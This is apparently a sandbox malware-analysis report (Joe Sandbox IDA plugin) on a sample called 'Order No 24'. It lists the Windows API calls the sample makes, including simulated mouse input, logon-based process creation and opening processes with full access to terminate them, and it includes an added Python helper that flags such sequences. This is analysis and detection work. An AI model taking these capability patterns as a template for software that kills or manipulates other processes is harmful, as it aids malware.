Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 2537439066-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,009D77F4,?,?,00000000,00000001), ref: 009D9B53
  • Part of subcall function 009D6544: GetWindowRect.USER32(?,?), ref: 009D6557
• GetDesktopWindow.USER32 ref: 009D9B7D
• GetWindowRect.USER32(00000000), ref: 009D9B84
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009D9BB6
  • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
• GetCursorPos.USER32(?), ref: 009D9BE2
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009D9C44
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009BAFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 009BAFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009BAFC4
• CloseHandle.KERNEL32(00000004), ref: 009BAFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009BAFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 009BB012
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
                                                                                                                                  • Opcode ID: 9c2adadf36fff9b525ec85eaac640d710fbe47d08e26bf7032ca87ac64ac1f9b
                                                                                                                                  • Instruction ID: 4666ea247d000c790ea7a911ab5e13c9047b7df0867277ec70b734c502bf71bf
                                                                                                                                  • Opcode Fuzzy Hash: 9c2adadf36fff9b525ec85eaac640d710fbe47d08e26bf7032ca87ac64ac1f9b
                                                                                                                                  • Instruction Fuzzy Hash: 9E2149B210420DABDB02DFE4DE09BEE7BA9AB44324F044015FA01A6161C376DD22EB61
APIs
  • Part of subcall function 0099AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
  • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099AFF2
  • Part of subcall function 0099AF83: BeginPath.GDI32(?), ref: 0099B009
  • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099B033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 009EEC20
• LineTo.GDI32(00000000,00000003,?), ref: 009EEC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EEC42
• LineTo.GDI32(00000000,00000000,?), ref: 009EEC52
• EndPath.GDI32(00000000), ref: 009EEC62
• StrokePath.GDI32(00000000), ref: 009EEC72
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 023de4020d2552c22181356a16e9cfb5840b33f31c7feaad1a6eace75858176f
• Instruction ID: 767d1ff1c6a222d5558e330057733e9547b96f15b0bddb0e3ab84dbd02fb30d2
• Opcode Fuzzy Hash: 023de4020d2552c22181356a16e9cfb5840b33f31c7feaad1a6eace75858176f
• Instruction Fuzzy Hash: 0011F77600014DBFEB02DFD4DD88EEA7F6DEB08354F048112BE0989160D7719D569BA0
APIs
• GetDC.USER32(00000000), ref: 009BE1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 009BE1D1
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 009BE1D8
• ReleaseDC.USER32(00000000,00000000), ref: 009BE1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 009BE1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 009BE209
  • Part of subcall function 009B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,009B9A05,00000000,00000000,?,009B9DDB), ref: 009BA53A
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
• Opcode ID: acefa3d6fda0d003cd312fdad50e666cb1e1b0ecffcb8ec63057fe838a3e9d4b
• Instruction ID: 3e70b19ad5083e6d0b8effd63eea69c7f6348c3dd7838c722914d00f980c4a07
• Opcode Fuzzy Hash: acefa3d6fda0d003cd312fdad50e666cb1e1b0ecffcb8ec63057fe838a3e9d4b
• Instruction Fuzzy Hash: 410184B5A00218BFEB109FE58C45B9EBFB8EB48351F004066EA04A7290D6719C02CBA0
APIs
• __init_pointers.LIBCMT ref: 009A7B47
  • Part of subcall function 009A123A: __initp_misc_winsig.LIBCMT ref: 009A125E
  • Part of subcall function 009A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009A7F51
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A7F65
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A7F78
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A7F8B
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A7F9E
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009A7FB1
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009A7FC4
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009A7FD7
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009A7FEA
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009A7FFD
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009A8010
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009A8023
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009A8036
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009A8049
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009A805C
  • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 009A806F
• __mtinitlocks.LIBCMT ref: 009A7B4C
  • Part of subcall function 009A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00A3AC68,00000FA0,?,?,009A7B51,009A5E77,00A36C70,00000014), ref: 009A7E41
• __mtterm.LIBCMT ref: 009A7B55
  • Part of subcall function 009A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009A7B5A,009A5E77,00A36C70,00000014), ref: 009A7D3F
  • Part of subcall function 009A7BBD: _free.LIBCMT ref: 009A7D46
  • Part of subcall function 009A7BBD: DeleteCriticalSection.KERNEL32(00A3AC68,?,?,009A7B5A,009A5E77,00A36C70,00000014), ref: 009A7D68
• __calloc_crt.LIBCMT ref: 009A7B7A
• GetCurrentThreadId.KERNEL32 ref: 009A7BA3
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
• String ID:
• API String ID: 2942034483-0
• Opcode ID: 167a36147ad0d32620d60ce5cb2f4aa489aa0e2b617f0773df4bc8e80bcc13ae
• Instruction ID: 3a82c66229465dac0df031e3688129864ddead28aa6373a7eb7f6ccd6e48b50d
• Opcode Fuzzy Hash: 167a36147ad0d32620d60ce5cb2f4aa489aa0e2b617f0773df4bc8e80bcc13ae
• Instruction Fuzzy Hash: A4F0907210D3121AEA24B7F47C0BB4BA6989F83734F2406A9F8A0C90E2FF21884241F0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 0098281D
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00982825
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00982830
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 0098283B
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00982843
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0098284B
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 0b4ed021063d0fb12ec438d03bb83eb09cf1510823c3f0f9c4401ec8e3ec074e
• Instruction ID: 59504fd36e985c3d85a635ae475179588be1aeac95e671a0f049c2a122b4931f
• Opcode Fuzzy Hash: 0b4ed021063d0fb12ec438d03bb83eb09cf1510823c3f0f9c4401ec8e3ec074e
• Instruction Fuzzy Hash: 530167B1902B5EBDE3008FAA8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 1423608774-0
• Opcode ID: bf2d27622c3f15a3478989ee61da448201170e45f9f55a46e735d3e0a6d65af7
• Instruction ID: 89d8be5fa050388d401fe3f061f7ef9e8866237c3fe77547526d923f558c2dc1
• Opcode Fuzzy Hash: bf2d27622c3f15a3478989ee61da448201170e45f9f55a46e735d3e0a6d65af7
• Instruction Fuzzy Hash: 28018133902611ABD715ABD4ED4CFEB7769FF8C701B04042DF503920A4DB74A802DB51
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009C7C07
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009C7C1D
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 009C7C2C
                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C3B
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C45
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C7C4C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                  • Opcode ID: 4cfa739cc5340220d447cc22334c52dc428bd90c83c525cf8c127bdb3b816cd6
                                                                                                                                  • Instruction ID: abaadf61be885949afd177d14e128f448fe7c899381ff99c00d21bd0f915057d
                                                                                                                                  • Opcode Fuzzy Hash: 4cfa739cc5340220d447cc22334c52dc428bd90c83c525cf8c127bdb3b816cd6
                                                                                                                                  • Instruction Fuzzy Hash: A4F01772641158BBE6219BD29C0EEEF7F7CEBC6B15F000118FA0192051EBA15A43D6B5
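The block above is the report's listing of a function that resolves a window to its owning process, opens it with desired access 001F0FFF, terminates it and closes the handle. Interpreting such listings by hand is tedious, so here is an added example (not part of the Joe Sandbox report, and not AutoIt's or the sample's own code) that parses lines in the IDA-plugin format shown on this page, decodes the OpenProcess access mask into named rights, and flags the open-then-terminate sequence. The sample input is constructed from the listing above. Assumptions: 0x001F0FFF is read as the pre-Vista SDK value of PROCESS_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF; Vista-era SDKs define 0x001FFFFF), and because the report shows the TerminateProcess handle argument as 00000000 rather than a tracked value, the check is positional (OpenProcess followed by TerminateProcess within the same listing), not a handle-flow analysis.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the Joe Sandbox IDA-plugin listing format
# ("• Api.Module(args), ref: addr"), taken from the blocks on this page.
SAMPLE = """\
• GetWindowThreadProcessId.USER32(?,?), ref: 009C7C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000), ref: 009C7C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010), ref: 009C7C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010), ref: 009C7C4C
  • Part of subcall function 009C93D1: CloseHandle.KERNEL32(?,?,009C9A6B), ref: 009C93DB
  • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
"""

# One listing line: optional "Part of subcall function X:" prefix, Api.Module,
# optional "(args)", optional comma, then "ref: hexaddr". Api names may contain
# "::" (C++ symbols) and "@N" (stdcall decorations), as the page shows.
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Process access rights (winnt.h). Bits 0x1000/0x2000 are the Vista+ additions.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]          # raw tokens; "?" means unknown at analysis time
    ref: int                 # address of the call site
    subcall_of: Optional[int]  # function address when the line is a callee's call


def parse_listing(text: str) -> List[Call]:
    """Parse every API line in an IDA-plugin listing; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def hex_arg(call: Call, i: int) -> Optional[int]:
    """Argument i as an int when the listing shows an 8-digit literal, else None."""
    if i < len(call.args) and re.fullmatch(r"[0-9A-Fa-f]{8}", call.args[i]):
        return int(call.args[i], 16)
    return None


def decode_access(mask: int):
    """Split a process access mask into known right names plus any unknown leftover bits."""
    known = 0
    for bit in PROCESS_RIGHTS:
        known |= bit
    names = [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]
    return names, mask & ~known


def find_open_then_terminate(calls: List[Call]):
    """Flag OpenProcess requesting PROCESS_TERMINATE followed by TerminateProcess.
    Sub-call lines are skipped; handle values are not tracked (positional check)."""
    findings = []
    opened = None
    for c in calls:
        if c.subcall_of is not None:
            continue
        if c.api == "OpenProcess":
            mask = hex_arg(c, 0)
            if mask is not None and mask & 0x0001:
                opened = c
        elif c.api == "TerminateProcess" and opened is not None:
            findings.append((opened.ref, c.ref, decode_access(hex_arg(opened, 0))[0]))
            opened = None
    return findings


if __name__ == "__main__":
    for open_ref, term_ref, rights in find_open_then_terminate(parse_listing(SAMPLE)):
        print(f"OpenProcess@{open_ref:08X} -> TerminateProcess@{term_ref:08X}: "
              f"{len(rights)} rights requested, including PROCESS_TERMINATE")
    names, leftover = decode_access(0x001F0FFF)
    print(names, hex(leftover))
```

Running it on the constructed sample reports the single open-then-terminate pair at 009C7C3B/009C7C45 and decodes 001F0FFF into 17 rights with no unknown bits, which is why an analyst reads that constant as "all access" rather than as a deliberately narrow request; the same parser applies unchanged to the other listings on this page.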
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 009C9A33
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A44
                                                                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A51
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A5E
                                                                                                                                    • Part of subcall function 009C93D1: CloseHandle.KERNEL32(?,?,009C9A6B,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C93DB
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 009C9A71
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,009F5DEE,?,?,?,?,?,0098ED63), ref: 009C9A78
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                  • Opcode ID: 2c34221f7f8cb96a86f67e6da3bce39b7d22e8772721ccc6dea8f0df364c9a70
                                                                                                                                  • Instruction ID: a74371c70ed6c94812ba7775ba051aae6d25ba4691ca28aae19d631dd3cfba3b
                                                                                                                                  • Opcode Fuzzy Hash: 2c34221f7f8cb96a86f67e6da3bce39b7d22e8772721ccc6dea8f0df364c9a70
                                                                                                                                  • Instruction Fuzzy Hash: 58F08233941215ABD7116BE4EC8DEEB7B39FF8C301B140425F603950A4DB759913DB51
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                                                                                                                    • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                                                                                                                  • __swprintf.LIBCMT ref: 00981EA6
                                                                                                                                  Strings
                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00981D49
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                  • API String ID: 2125237772-557222456
                                                                                                                                  • Opcode ID: 786e7f28207433d30f77e1c5e9f864e7c311607f66f1dbd8b40b5956dfbc5c0f
                                                                                                                                  • Instruction ID: 91b0a829080307cdf73867a625ebe56616cc4ba9e06b4444b95f351360c1af4b
                                                                                                                                  • Opcode Fuzzy Hash: 786e7f28207433d30f77e1c5e9f864e7c311607f66f1dbd8b40b5956dfbc5c0f
                                                                                                                                  • Instruction Fuzzy Hash: DD914AB1508205AFC724FF24C995E6AB7A8AFD5700F04492DF996972A2DB30ED05CB92
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009DB006
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 009DB115
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009DB298
                                                                                                                                    • Part of subcall function 009C9DC5: VariantInit.OLEAUT32(00000000), ref: 009C9E05
                                                                                                                                    • Part of subcall function 009C9DC5: VariantCopy.OLEAUT32(?,?), ref: 009C9E0E
                                                                                                                                    • Part of subcall function 009C9DC5: VariantClear.OLEAUT32(?), ref: 009C9E1A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                                  • Opcode ID: bb95d88450706e2a1875d171a5930fde17edfa8be7810a65ee1241acfb0dd1cd
                                                                                                                                  • Instruction ID: 4fcf2de2620dcc0465a852ffe84b569a4d27e10e09fd1da072f8e07db17c074f
                                                                                                                                  • Opcode Fuzzy Hash: bb95d88450706e2a1875d171a5930fde17edfa8be7810a65ee1241acfb0dd1cd
                                                                                                                                  • Instruction Fuzzy Hash: 05917C75648301DFCB10EF24C495A5AB7E8EFC8704F04886EF99A9B3A1DB31E945CB52
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                                                                                                                  • _memset.LIBCMT ref: 009C5438
                                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 009C5467
                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009C5513
                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009C553D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 4152858687-4108050209
                                                                                                                                  • Opcode ID: 3445873ca4982ecca744313708bf9dc13627dd3548f0c7b9ce7f49351c9e2e75
                                                                                                                                  • Instruction ID: 74eb3905ce055e16c37f555f9a70d2c41678ca2985afdb2e18c37eaac782f8a7
                                                                                                                                  • Opcode Fuzzy Hash: 3445873ca4982ecca744313708bf9dc13627dd3548f0c7b9ce7f49351c9e2e75
                                                                                                                                  • Instruction Fuzzy Hash: 36510072A087419BD7149B28C840F6BB7E8AF95360F050A2DF895D31A0DBA4EDC08B53
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009C027B
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009C02B1
                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009C02C2
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009C0344
